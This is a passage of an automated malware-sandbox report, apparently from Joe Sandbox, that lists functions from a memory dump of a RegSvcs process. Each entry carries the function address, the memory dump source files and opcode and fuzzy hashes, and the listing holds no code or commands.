                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                            • Instruction ID: 208df296711adfe6afae0e06cef992c0f5d225c9e5ac2b8002991f8a2645fc14
                                                                                            • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                            • Instruction Fuzzy Hash: D3312CB2B00B01AFD760CF6ACD41B57B7F8AF19B60F14052DA59AC3650E730E904EB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F9438F Relevance: .1, Instructions: 89COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c04e7c25a854d9b8243e3568d93de2619a396439db8086f17f3eb388d67e53b6
                                                                                            • Instruction ID: 054103dd6d6a0efca6a6207fda0bde186b8697d53a89d372a184f4a5ee3906df
                                                                                            • Opcode Fuzzy Hash: c04e7c25a854d9b8243e3568d93de2619a396439db8086f17f3eb388d67e53b6
                                                                                            • Instruction Fuzzy Hash: C231A132A002059FEB24EFB8C981F6AB7FAAB94704F14452AE445D7295D734E942EB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F6C156 Relevance: .1, Instructions: 88COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fbdfd856c5fd31dd70602750feaf25c16196f44d2f94699ef6044b095248ffea
                                                                                            • Instruction ID: ef75a70346b1b1336556b552d6b467d111d06a5ee3cc84ab32e36dd413698969
                                                                                            • Opcode Fuzzy Hash: fbdfd856c5fd31dd70602750feaf25c16196f44d2f94699ef6044b095248ffea
                                                                                            • Instruction Fuzzy Hash: 763129B19002018BC720AF24CC42FAD77B4AF40314F54C17DE8899F382DA79DD86EB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0102C3CD Relevance: .1, Instructions: 88COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                            • Instruction ID: 05a7380ebe98fccc3dcf33d886d9c912a4db1ef26d69382a6f2c2d1b9deb3031
                                                                                            • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                            • Instruction Fuzzy Hash: 48216036A0066176EB15AB958D01AFFBBB4EF90714F40841AFAD587551EB38DD40C360
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F6E420 Relevance: .1, Instructions: 88COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 55822c2227413ef222c1388d4bef3903ae421b0a28b0ddd4debd6eb2369d6402
                                                                                            • Instruction ID: a2c2f80c125e51477dafdf3fa2a938c96d67d30d2521376c09ad57d617b95bad
                                                                                            • Opcode Fuzzy Hash: 55822c2227413ef222c1388d4bef3903ae421b0a28b0ddd4debd6eb2369d6402
                                                                                            • Instruction Fuzzy Hash: A831F93BA4152C9BDB31DF24CC42FEE77B9EB15B50F0101A1F545A7291DA74AE80AF90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FA44B0 Relevance: .1, Instructions: 87COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e0c5e25595e9468b12d7d8d93c20f02ad238966ea9f5ec389447d31e90fb0e01
                                                                                            • Instruction ID: 713629a5e2b6964c0d14f68ec0ea89cbce68575d864ea4bb6553e822f3b29f30
                                                                                            • Opcode Fuzzy Hash: e0c5e25595e9468b12d7d8d93c20f02ad238966ea9f5ec389447d31e90fb0e01
                                                                                            • Instruction Fuzzy Hash: 0521B1B2A047459FCB21DF18C881B6B77E4FB8A760F044929F9549B241D774ED01ABA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FA4588 Relevance: .1, Instructions: 87COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                            • Instruction ID: 708a283527786302fb2e7e5e10a232ed570959d66f487cefc27a630ae45ebdf0
                                                                                            • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                            • Instruction Fuzzy Hash: 6B217172A00608EFCB15DF58C980A8EBBB9FF8A714F108065ED259B341D6B5EE059B90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F6E388 Relevance: .1, Instructions: 86COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                            • Instruction ID: 9d4051f491c48d67ad88579de41c352c580fd36b08510898d04526330c991640
                                                                                            • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                            • Instruction Fuzzy Hash: 9631BF36600605EFD721DF68C985F6AB7F8EF85354F2045A9E552CB690EB30EE01EB50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FEE609 Relevance: .1, Instructions: 86COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 966d59a20ac78eb0def925a797475841f61062b1e503190f8bedab5d829f47d2
                                                                                            • Instruction ID: 96cb5aa84e6ecf68dde72716f3d840997345057ee47a5db5fd42a45a03b2c745
                                                                                            • Opcode Fuzzy Hash: 966d59a20ac78eb0def925a797475841f61062b1e503190f8bedab5d829f47d2
                                                                                            • Instruction Fuzzy Hash: D431BC75A10245EFCB14CF19D8849AEB7B5FF94304B11846AF84A9B3A1EB31EE50DB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FF06F1 Relevance: .1, Instructions: 79COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9aa667bf15fc1912047af9057b3f035b35f306edf90129350de681af73da3e8c
                                                                                            • Instruction ID: edc45901158025a85a6dcc1a9414021981623c5044292f6729a96954483aaa51
                                                                                            • Opcode Fuzzy Hash: 9aa667bf15fc1912047af9057b3f035b35f306edf90129350de681af73da3e8c
                                                                                            • Instruction Fuzzy Hash: C3218072A005299BCF20EF59C881ABEB7F4FF48740B500069F941FB251D738AD41DBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FF019F Relevance: .1, Instructions: 78COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 090037e1b69b7c59b9c28f591c119a8ea45f4c3d7d178b659e396e9266f90b71
                                                                                            • Instruction ID: ca27275e0d44677167046cdfafb3a7c397508a5871a74272cb5a988af2452fa8
                                                                                            • Opcode Fuzzy Hash: 090037e1b69b7c59b9c28f591c119a8ea45f4c3d7d178b659e396e9266f90b71
                                                                                            • Instruction Fuzzy Hash: 4621BC72A00608AFD715EB68CC44FAAB7A8FF48740F140069F904D76A2DB38EE00DB64
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FF0283 Relevance: .1, Instructions: 74COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 809af9062f3acf30fc09d13aa4c5a75970fb371f992db0afeaebfbe12c80cdb1
                                                                                            • Instruction ID: 662c9840992fc515bcb7e11e93e002afcd6d92b1aae2d1291c840b781e1a9a58
                                                                                            • Opcode Fuzzy Hash: 809af9062f3acf30fc09d13aa4c5a75970fb371f992db0afeaebfbe12c80cdb1
                                                                                            • Instruction Fuzzy Hash: 7221F1729042499BC711EF59C948FBBB7DCAF90B50F080466BE80C7272DB34DA48E7A1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F92835 Relevance: .1, Instructions: 73COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c001b739cb15be9705030134e0d329179c3f919ae42d23f9562472bda5dbd1b2
                                                                                            • Instruction ID: 4a6ec3cc9f411f110a53c4ff8b53e8acbf6682cadf240e6da2a76a1b992cc8cb
                                                                                            • Opcode Fuzzy Hash: c001b739cb15be9705030134e0d329179c3f919ae42d23f9562472bda5dbd1b2
                                                                                            • Instruction Fuzzy Hash: 30210E32B45684ABF72257688C04F643796AF41B74F2C03A6F9209BBE2DB6CDC01E245
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FAA30B Relevance: .1, Instructions: 70COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5b570f6e49ef94e52dbbacd8ed0e09f4eddae749799567b347fda545d4eaf897
                                                                                            • Instruction ID: e2ea62ad450a53fcbaf0c0513857692c28869e3f87cd5247ad3bc2e468def314
                                                                                            • Opcode Fuzzy Hash: 5b570f6e49ef94e52dbbacd8ed0e09f4eddae749799567b347fda545d4eaf897
                                                                                            • Instruction Fuzzy Hash: 0421A976600B419FCB24DF29CC01B56B3F5EF09B44F288468A449CBB62E336E946DB94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0102A49A Relevance: .1, Instructions: 70COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0b4a9f6efdc45b0012c44eff3f15ac5583389b3bf48bf64c63caed10d17750e1
                                                                                            • Instruction ID: 978cd5b86d38eec2e7a4f91225a4e9f832535b8f6464db14d6d99969ec37a14b
                                                                                            • Opcode Fuzzy Hash: 0b4a9f6efdc45b0012c44eff3f15ac5583389b3bf48bf64c63caed10d17750e1
                                                                                            • Instruction Fuzzy Hash: 8C112372380A30FBE72256599C01F6BB6999BD4BB0F100069FB48CB691EF60DC019695
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FF0946 Relevance: .1, Instructions: 70COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 59ca298d8fd2c493b0f2411877d0a5f94cd9be3d902f1e2a82c11126565794d3
                                                                                            • Instruction ID: 2b5b25b6163c369afd466970576de2f0355b85d86268e83ad7d1ae0a9550186a
                                                                                            • Opcode Fuzzy Hash: 59ca298d8fd2c493b0f2411877d0a5f94cd9be3d902f1e2a82c11126565794d3
                                                                                            • Instruction Fuzzy Hash: D42119B1E00218ABCB20DFAAD8819AEFBF8FF98710F10012FE505A7351DA759941CB50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 010080A8 Relevance: .1, Instructions: 69COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                            • Instruction ID: 85ccc2fb4af5d861dd7326633cc9584a74113596a09c3b03d83a5dd83c39c699
                                                                                            • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                            • Instruction Fuzzy Hash: E5214D72A00209EFEB129F98CC41BEEBBB9FF88310F204456F995A7291D774DA519B50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FA0124 Relevance: .1, Instructions: 68COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                            • Instruction ID: 064d0acf2f9d045d85abedea128a3db39d7024f59d860ac3b69ea3601e423886
                                                                                            • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                            • Instruction Fuzzy Hash: 9511C4B3A01604BFD7229F54DC41FDABBB8EB82764F204029F6059B190DA75ED45EB50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F78770 Relevance: .1, Instructions: 68COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
